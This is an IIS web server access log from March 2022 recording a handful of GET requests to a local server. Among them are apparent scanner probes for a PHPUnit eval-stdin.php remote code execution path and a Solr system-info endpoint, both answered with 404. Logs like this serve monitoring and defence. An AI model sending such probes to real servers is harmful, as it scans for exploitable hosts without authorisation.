22:24:12 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 468 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 23:12:38 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 23:12:38 192.168.0.14 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 265 2022-03-28 23:16:03 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 359 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 23:45:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 23:45:01 192.168.0.14 GET /solr/admin/info/system wt=json 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 421